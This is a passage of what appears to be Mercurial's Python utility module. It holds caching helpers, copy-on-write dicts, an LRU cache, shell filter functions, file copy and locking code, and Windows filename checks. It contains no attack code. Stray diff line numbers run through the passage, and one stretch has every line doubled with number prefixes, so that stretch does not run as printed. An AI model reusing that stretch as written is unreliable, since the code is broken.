    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount

    if argcount == 0:
        # Nullary function: remember the single result in a one-slot list.
        slot = []
        def f():
            if not slot:
                slot.append(func())
            return slot[0]
        return f

    memo = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
        return f

    def f(*args):
        if args not in memo:
            memo[args] = func(*args)
        return memo[args]
    return f
1159
1157
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        copies = getattr(self, '_copied', 0)
        if not copies:
            # Nobody else holds a "copy" of this object, so writing in
            # place is safe.
            return self
        # Someone shares this object: hand the writer a real copy and
        # drop one share from the count.
        self._copied = copies - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
1177
1175
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Re-setting an existing key moves it to the end ("last-set"
        # order), unlike plain OrderedDict which keeps the original slot.
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            # Route every assignment through __setitem__ explicitly so the
            # last-set ordering above is preserved on PyPy too.
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
1202
1200
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
    # All behavior comes from cow (preparewrite/copy) and dict; the copy
    # constructor used by preparewrite is dict's ``dict(mapping)``.
1228
1226
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
    # All behavior comes from cow (preparewrite/copy) and sortdict
    # (last-set key ordering).
1234
1232
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    # Python 2 style metaclass assignment. NOTE(review): a bare
    # ``__metaclass__`` attribute has no effect on Python 3, so the
    # abstractmethod decorators below are not enforced there -- confirm
    # whether that matters for py3 support.
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Commit only on a clean exit; release() always runs, which aborts
        # the transaction if close() was never reached.
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()
1259
1257
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is not a failure: keep (close) the work done
        # so far, then re-raise so the caller can prompt the user.
        tr.close()
        raise
    finally:
        # release() aborts the transaction if it was never closed.
        tr.release()
1277
1275
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing on enter or exit."""
    yield
1281
1279
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # Link pointers; the owning lrucachedict wires these into a
        # circular list.
        self.next = None
        self.prev = None

        # The module-level ``_notset`` sentinel marks a node that holds no
        # cache entry (distinguishes "empty" from a stored None).
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1300
1298
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        # Circular doubly linked list, starting with a single self-linked
        # node; capacity is grown lazily as entries are inserted.
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
1459
1457
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    # Single-argument functions get a slightly cheaper wrapper keyed on
    # the bare argument; otherwise key on the full args tuple.
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                # Evict the least recently used entry once > 20 cached.
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f
1486
1484
class propertycache(object):
    """Decorator turning a method into a lazily-computed attribute.

    The wrapped function runs once per instance; its result is stored in
    the instance ``__dict__`` under the same name, so later accesses hit
    the plain attribute and never re-enter this descriptor.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
1499
1497
def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    # Cached values live directly in the instance __dict__ (see
    # propertycache.cachevalue); absence means nothing to clear.
    if prop in obj.__dict__:
        del obj.__dict__[prop]
1504
1502
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    # ``closefds`` is a platform-dependent module-level flag (False on
    # Windows, True elsewhere) — assumed defined earlier in this module.
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    return pout
1511
1509
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, r'wb')
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        # OpenVMS reports success with odd status codes.
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise error.Abort(_("command '%s' failed: %s") %
                              (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # Best-effort cleanup of both temporary files.
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
1545
1543
# Maps a filter-spec prefix to the function implementing that mechanism;
# consulted by filter() below.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
1550
1548
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # Dispatch on a recognized prefix (e.g. 'tempfile:'); default is a pipe.
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)
1557
1555
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # Position of the highest set bit; 0 maps to 0.
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                # Grow the threshold: at least double, or the largest
                # power of two not exceeding what we just emitted.
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        # Final (possibly undersized) chunk.
        yield ''.join(buf)
1588
1586
def always(fn):
    '''matcher predicate that accepts every file name'''
    return True
1591
1589
def never(fn):
    '''matcher predicate that rejects every file name'''
    return False
1594
1592
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        # Remember prior state so we only re-enable if it was enabled.
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper
1617
1615
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
1621
1619
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # Different drives (Windows): no relative path exists; anchor at root.
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # Strip the common prefix of both paths.
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # Climb out of what remains of n1, then descend into n2.
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1647
1645
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1657
1655
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)
1666
1664
# Cached path of the 'hg' executable; populated lazily by hgexecutable().
_hgexecutable = None

def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[r'__main__']
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1692
1690
1693 def _sethgexecutable(path):
1691 def _sethgexecutable(path):
1694 """set location of the 'hg' executable"""
1692 """set location of the 'hg' executable"""
1695 global _hgexecutable
1693 global _hgexecutable
1696 _hgexecutable = path
1694 _hgexecutable = path
1697
1695
1698 def _testfileno(f, stdf):
1696 def _testfileno(f, stdf):
1699 fileno = getattr(f, 'fileno', None)
1697 fileno = getattr(f, 'fileno', None)
1700 try:
1698 try:
1701 return fileno and fileno() == stdf.fileno()
1699 return fileno and fileno() == stdf.fileno()
1702 except io.UnsupportedOperation:
1700 except io.UnsupportedOperation:
1703 return False # fileno() raised UnsupportedOperation
1701 return False # fileno() raised UnsupportedOperation
1704
1702
def isstdin(f):
    """Return whether ``f`` is connected to the process's real stdin."""
    return _testfileno(f, sys.__stdin__)
1707
1705
def isstdout(f):
    """Return whether ``f`` is connected to the process's real stdout."""
    return _testfileno(f, sys.__stdout__)
1710
1708
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # None/False -> '0', True -> '1', everything else stringified.
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    env['HG'] = hgexecutable()
    return env
1725
1723
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or isstdout(out):
        # Child inherits our stdout/stderr directly.
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # Capture combined stdout+stderr and forward it to ``out``.
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    # OpenVMS reports success with odd status codes.
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1752
1750
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # A one-frame traceback means the TypeError came from the call
            # itself (bad arity), not from inside func's body.
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check
1764
1762
1765 # a whilelist of known filesystems where hardlink works reliably
1763 # a whilelist of known filesystems where hardlink works reliably
1766 _hardlinkfswhitelist = {
1764 _hardlinkfswhitelist = {
1767 'btrfs',
1765 'btrfs',
1768 'ext2',
1766 'ext2',
1769 'ext3',
1767 'ext3',
1770 'ext4',
1768 'ext4',
1771 'hfs',
1769 'hfs',
1772 'jfs',
1770 'jfs',
1773 'NTFS',
1771 'NTFS',
1774 'reiserfs',
1772 'reiserfs',
1775 'tmpfs',
1773 'tmpfs',
1776 'ufs',
1774 'ufs',
1777 'xfs',
1775 'xfs',
1778 'zfs',
1776 'zfs',
1779 }
1777 }
1780
1778
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (
                            oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))
1833
1831
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # Hardlinking is only attempted when src and dst share a device.
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # Offset child progress by what this level already copied.
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # Give up on hardlinks for the rest of the tree too.
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1873
1871
# Path components that Windows reserves for devices (matched
# case-insensitively, regardless of any extension appended).
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
# Characters that may never appear in a Windows filename.
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # examine each path component separately
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        # everything before the first '.' is checked against device names
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        # a trailing '.' or ' ' is forbidden, but the components '.' and
        # '..' themselves are fine; note "n not in '..'" is a substring
        # test that deliberately matches both '.' and '..'
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1926
1924
# Platform-dependent selection: on Windows the generic filename check
# above doubles as the OS check and time.clock has the best resolution;
# elsewhere defer to the platform module and wall-clock time.
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

# prefer the monotonic high-resolution counter when this Python has it
if safehasattr(time, "perf_counter"):
    timer = time.perf_counter
1936
1934
def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    # Preferred primitive: a symlink whose target carries the lock info.
    # Creation is atomic and fails with EEXIST when already locked.
    try:
        return os.symlink(info, pathname)
    except AttributeError:  # no symlink in os
        pass
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
        # any other symlink failure: fall through to the file fallback

    # Fallback: exclusively create a regular file holding the info.
    flags = getattr(os, 'O_BINARY', 0) | os.O_CREAT | os.O_WRONLY | os.O_EXCL
    fd = os.open(pathname, flags)
    os.write(fd, info)
    os.close(fd)
1955
1953
def readlock(pathname):
    """Return the info stored in the lock at pathname.

    Reads the symlink target when the lock is a symlink (the normal
    case), falling back to reading the file's contents otherwise.
    """
    try:
        return os.readlink(pathname)
    except AttributeError:  # no symlink in os
        pass
    except OSError as why:
        # EINVAL: exists but is not a symlink; ENOSYS: no symlink support
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    fp = posixfile(pathname, 'rb')
    data = fp.read()
    fp.close()
    return data
1968
1966
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # no descriptor available; stat the path it claims to come from
        return os.stat(fp.name)
    return os.fstat(fd)
1975
1973
1976 # File system features
1974 # File system features
1977
1975
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    # fold the case of the final component; try upper, then lower
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
    except OSError:
        # the folded variant doesn't resolve: case is significant
        return True
    # same inode under both spellings means case-insensitive
    return s2 != s1
2000
1998
# Probe for Google's re2 regex engine.  _re2 is tri-state: None means
# "imported but not yet verified", False means unavailable; it becomes
# True only after _re._checkre2() confirms matching works.
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
2006
2004
class _re(object):
    # Facade over the stdlib re module (imported as remod) that
    # transparently prefers the faster re2 engine when usable.
    def _checkre2(self):
        """Verify that re2 actually works and record the result in _re2."""
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes flags as inline pattern syntax, not as arguments
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses a feature re2 doesn't support; fall back
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape
2049
2047
# module-level singleton; callers use it as a drop-in for the re module
re = _re()
2051
2049
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map normcased name -> on-disk spelling for one directory
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # (str.replace returns a new string -- the result must be kept, and
    # byte literals are needed so this also works when seps is bytes)
    seps = seps.replace(b'\\', b'\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs are passed through untouched
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
2094
2092
def checknlink(testfile):
    '''check whether hardlink count reporting works properly

    Returns True only when a freshly created hardlink next to testfile
    reports a link count greater than one.
    '''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        # derive a sibling name by swapping the '1~' suffix for '2~'
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        # always clean up the probe files, ignoring removal failures
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
2123
2121
def endswithsep(path):
    '''Check whether path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    # preserve the original truthy/falsy result when osaltsep is empty
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
2128
2126
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    # plain split: empty components are preserved, mirroring str.split
    return path.split(pycompat.ossep)
2136
2134
def gui():
    '''Are we running in a GUI?

    Returns a truthy value when a graphical session appears available
    (always truthy on Windows; elsewhere based on $DISPLAY or, on
    macOS, a CoreGraphics session).
    '''
    if pycompat.isdarwin:
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
2151
2149
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # original doesn't exist: the empty temp file suffices
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
